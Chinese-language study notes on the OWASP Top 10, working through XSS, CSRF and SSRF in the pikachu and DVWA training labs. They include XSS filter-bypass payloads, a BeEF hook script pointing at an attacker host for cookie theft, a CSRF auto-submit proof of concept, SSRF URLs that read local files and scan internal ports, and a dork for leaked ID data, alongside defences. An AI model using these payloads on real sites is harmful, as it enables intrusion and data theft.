OWASP TOP10

OWASP网址：http://ww.owasp.org.cn

A01：失效的访问控制

例如：越权漏洞

案例1：

正常：每个人登录教务系统，只能查询自己的成绩信息

漏洞：张三登录后可以查看自己的成绩  例如：score?stuno=231011;如果张三输入了李四的学号，竟然可已查询李四的成绩 。。   这就属于越权漏洞、也属于失效的访问控制

案例2：

某些文库网站，要想下载相应的文章需要支付费用，我支付并下载了文章1，url=download?article=23123:通过遍历或其他方式获取了文章2的编号、修改url，可以再不支付的情况下，下载文章2.  。 。    这也输入越权漏洞、也属于失效的访问控制

A02：加密机制失效（敏感信息泄露）

2017年类别名称是敏感信息泄露、以漏洞产生的后果命名；2021年以漏洞产生的原因命名

为加密机制失效

案例1：

使用google hacking语法进行敏感信息收集。   除了google以外，一些常见的搜索引擎包括必应、百度也支持google hacking语法

filetype:xls 身份证号

 

A03：注入

SQL注入、XSS（JS代码）注入、命令注入、代码注入等

A04：不安全设计（2021新漏洞类别）

一个软件项目的生命周期：

需求分析->项目设计->项目实现->项目测试->维护上线->代码审计

安全左移

A05：安全配置错误（合并）

2021的类别包含了2017年的XXE漏洞

A06：自带缺陷和过时的组件（使用含有已知漏洞的组件）

案例1：

很多博客网站，都为注册用户提供了发表文章的功能。其中编写文章内容时，都会使用编辑器组件，方便文章内容的编写，如果网站本身没有漏洞，但是编辑器插件有漏洞，也会给网站带来安全风险

A07：身份识别和身份验证错误（失效的身份认证）

例如：弱口令属于这类漏洞

A08：软件和数据完整性故障（不安全的反序列化）

A09：安全日志和监控故障（不足的日志记录和监控）

A10：SSRF服务器端请求伪造（2021新漏洞类别）

XSS跨站脚本

XSS介绍

XSS分类

持久型也称为存储型

反射型XSS攻击原理

反射型XSS实例

url是get传参

运行结果

基于pikachu靶场的反射性XSS实验

F12，修改文本框长度

在文本框输入：<script>alert(1)</script> ，只要有弹框效果的出现，就说明有XSS漏洞

反射型XSS常见功能点

产品、新闻等搜索框功能，有可能存在反射型XSS

反射型XSS：真实案例：搜索结果"" >> 西安夏溪电子科技有限公司

在文本框输入：<script>alert(1)</script> ，只要有弹框效果的出现，就说明有XSS漏洞

持久型（存储型）XSS攻击原理

持久型XSS概念

持久型XSS实例

结果

持久型XSS常见功能点

逢框必X 只要有输入框，就有可能有XSS漏洞

发表文章、文章评论

商品评价、回复

用餐评价

DOM型XSS原理

DOM型XSS概念

DOM型XSS实例

DVWA账号admin 密码password

弹窗意味着存在该类型漏洞

恶意数据：payload     <script>alert(1)</script>

DOM型XSS常见功能点

只要在前端页面中使用了参数，都可能导致DOM型XSS。

反射型XSS和DOM型XSS的对比

不同点：

反射型XSS的恶意参数会发送给服务器，并通过服务器反射回浏览器；

DOM型XSS的恶意参数不会发送给服务器，直接被页面的JS代码使用；

相同点：

两者漏洞利用（攻击）步骤相同。都是先构造恶意链接发送给受害者，引诱受害者点击

payload

为了验证或者测试漏洞利用所写的特殊数据，有时称为payload

<script>alert(1)</script>

以反射型XSS为例，DVWA靶场不同安全等级

Low：

payload   ：  <script>alert(1)</script>

Medium：

 过滤代码：$name = str_replace( '<script>', '', $_GET[ 'name' ] );

输入的$name,如果有<script>就替换成’空’

str_replace（）  字符串替换函数

针对这个限制，我们采用大小写绕过，因为HTML标签不区分大小写

payload  :   <SCRIPT>alert(1)</SCRIPT>

High：

 过滤代码：$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

无论script哪个字母是大写或小写，都会被替换成空

preg_replace()正则替换

payload  :   <img src=1  οnerrοr=alert(1)>

故意把路径格式写错，则执行alert（1）

Impossible：

BeEF-XSS攻击实战

BeEF介绍

BeFF原理

BeFF功能介绍

在kali中安装BeFF

1. apt-get update

1. 执行apt-get install ruby，先安装ruby，beEF是基于ruby语言开发的

apt-get install ruby

1. 执行apt-get install beef-xss命令，安装BeEF。

apt-get install beef-xss

4、输入beef-xss命令，启动BeEF

输入一个密码，例如123456后，回车

攻击目标浏览器

将代码<script src="http://192.168.10.224:3000/hook.js"></script>  写入有xss漏洞的服务器

1. cookie获取
2. 浏览器劫持

3）钓鱼

XSS攻击的防御

1. 输入端过滤

使用preg_replace()对特殊字符进行限制

2)输出端过滤

$name = htmlspecialchars($name);    将特殊字符<>做html实体编码转换

1. Http only

在前端不允许使用js读取cookie数据

CSRF跨站请求伪造

CSRF介绍

CSRF攻击流程

sessionid（用户信息）向服务器提交是自动的，不需要代码实现

基于pikachu靶场的CSRF实例

1）CSRF---GET

抓取点击submit时的数据包

2）CSRF---POST

3)CSRF_token

Token值每次刷新都不一样，安全性高

快速生成CSRF--POC脚本

<script>

window.οnlοad=function(){

document.getElementById("postsubmit").click();

}

</script>

得到一个结论，从用户角度，操作完之后一定退出登录，再操作其他网站，就可以避免CSRF攻击

但是：从开发者角度出发，即使用户不退出登录，我们也应该对CSRF攻击进行防御，引入CSRFtoken

CSRF防御实例

1）引入CSRF_token（一次性，随机性）

2）REFERER属性

Referer校验，比对HOST地址与数据包发出的地址，如果不同则无法执行后续修改密码的操作

检查数据包中的Referer的值，是否与当前url来自同一个网站

3）曾用密码确认

1. 短信邮件确认

CSRF与XSS的区别

利用XSS漏洞可以拿到cookie的数据（sessionid）但是利用CSRF漏洞只是借用了cookie的数据，无法获取cookie的数据（sessionid）

XSS漏洞比CSRF漏洞更危险。甚至对安全要求不严格的网站，会忽略CSRF漏洞

SSRF服务器端请求伪造

SSRF概念

SSRF攻击流程

SSRF场景

都包含url参数

SSRF相关的PHP函数

1）cur_exec()--执行curl命令

Curl是一个工具，工具的功能非常强大，可以完成文件的上传和下载、html页面的访问，同时还支持很多的协议

2）file_get_contents()函数

读取通过参数指定的文件的内容

SSRF危害

SSRF   curl漏洞利用

1. 正常访问外网

参数是百度的网址

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=http://www.baidu.com

参数是淘宝的网址

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=http://www.taobao.com

参数是京东的网址

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=http://www.jd.com

1. 漏洞利用

参数是windows配置文件

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=file:///c:/windows/win.ini

参数是内网服务器

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=http://192.168.10.143

1. 探测内网服务器端口/服务信息

21、22、80、3306返回了对应的服务信息、表示端口开放

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=dict://192.168.10.143:21

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=dict://192.168.10.143:2

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=dict://192.168.10.143:80

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=dict://192.168.10.143:3306

6379端口探测没有返回任何信息，表示端口未开放

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=dict://192.168.10.143:6379

结合burpsuite去探测端口

SSRF   curl漏洞利用

1）正常访问外网

读取百度首页

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_fgc.php?file=http://www.baidu.com

2）漏洞利用

读取windows的配置文件

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_fgc.php?file=c:/windows/win.ini

读取探针文件，返回服务器信息

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_fgc.php?file=http://127.0.0.1/phpinfo.php

3）读取php源码（只读）

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_fgc.php

?file=php://filter/read=convert.base64-encode/resource=../../inc/config.inc.php

  php伪协议 ../上层路径

base64是编解码  不是加解密

读到的是base64编码后的文件

PD9waHAKLy/lhajlsYBzZXNzaW9uX3N0YXJ0CnNlc3Npb25fc3RhcnQoKTsKLy/lhajlsYDlsYXorr7nva7ml7bljLoKZGF0ZV9kZWZhdWx0X3RpbWV6b25lX3NldCgnQXNpYS9TaGFuZ2hhaScpOwovL+WFqOWxgOiuvue9rum7mOiupOWtl+espgpoZWFkZXIoJ0NvbnRlbnQtdHlwZTp0ZXh0L2h0bWw7Y2hhcnNldD11dGYtOCcpOwovL+WumuS5ieaVsOaNruW6k+i/nuaOpeWPguaVsApkZWZpbmUoJ0RCSE9TVCcsICcxMjcuMC4wLjEnKTsvL+WwhmxvY2FsaG9zdOaIluiAhTEyNy4wLjAuMeS/ruaUueS4uuaVsOaNruW6k+acjeWKoeWZqOeahOWcsOWdgApkZWZpbmUoJ0RCVVNFUicsICdyb290Jyk7Ly/lsIZyb2905L+u5pS55Li66L+e5o6lbXlzcWznmoTnlKjmiLflkI0KZGVmaW5lKCdEQlBXJywgJ3Jvb3QnKTsvL+WwhnJvb3Tkv67mlLnkuLrov57mjqVteXNxbOeahOWvhuegge+8jOWmguaenOaUueS6hui/mOaYr+i/nuaOpeS4jeS4iu+8jOivt+WFiOaJi+WKqOi/nuaOpeS4i+S9oOeahOaVsOaNruW6k++8jOehruS/neaVsOaNruW6k+acjeWKoeayoemXrumimOWcqOivtO+8gQpkZWZpbmUoJ0RCTkFNRScsICdwaWthY2h1Jyk7Ly/oh6rlrprkuYnvvIzlu7rorq7kuI3kv67mlLkKZGVmaW5lKCdEQlBPUlQnLCAnMzMwNicpOy8v5bCGMzMwNuS/ruaUueS4um15c3Fs55qE6L+e5o6l56uv5Y+j77yM6buY6K6kdGNwMzMwNgoKPz4K

解码

<?php

//全局session_start

session_start();

//全局居设置时区

date_default_timezone_set('Asia/Shanghai');

//全局设置默认字符

header('Content-type:text/html;charset=utf-8');

//定义数æ®åº“连接å‚æ•°

define('DBHOST', '127.0.0.1');//å°†localhost或者127.0.0.1修改为数æ®åº“æœåŠ¡å™¨çš„地å€

define('DBUSER', 'root');//å°†root修改为连接mysql的用户å

define('DBPW', 'root');//å°†root修改为连接mysql的密ç ï¼Œå¦‚果改了还是连接ä¸ä¸Šï¼Œè¯·å…ˆæ‰‹åŠ¨è¿žæŽ¥ä¸‹ä½ çš„æ•°æ®åº“，确ä¿æ•°æ®åº“æœåŠ¡æ²¡é—®é¢˜åœ¨è¯´ï¼

define('DBNAME', 'pikachu');//自定义，建议ä¸ä¿®æ”¹

define('DBPORT', '3306');//å°†3306修改为mysql的连接端å£ï¼Œé»˜è®¤tcp3306

?>

SSRF漏洞利用实战

SSRF防御

1）禁用不需要的协议

例如仅允许http和https请求

    // 1、初始化

    $CH = curl_init($URL);

    // 2、设置选项

    curl_setopt($CH, CURLOPT_HEADER, FALSE);

    curl_setopt($CH, CURLOPT_SSL_VERIFYPEER, FALSE);

    // 2.2限制只能使用HTTP/HTTPS协议

    curl_setopt($CH,CURLOPT_PROTOCOLS,CURLPROTO_HTTP|CURLPROTO_HTTPS);

    // 3、执行命令

    $RES = curl_exec($CH);

    curl_close($CH) ;

2）对参数使用黑名单或白名单

// 白名单

    if($URL!="http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info1.php"){

        // 结束程序

        die("禁止访问");

    }

3）限制请求端口

乌云镜像链接

乌云网镜像丨乌云知识库丨Wooyun镜像丨乌云漏洞平台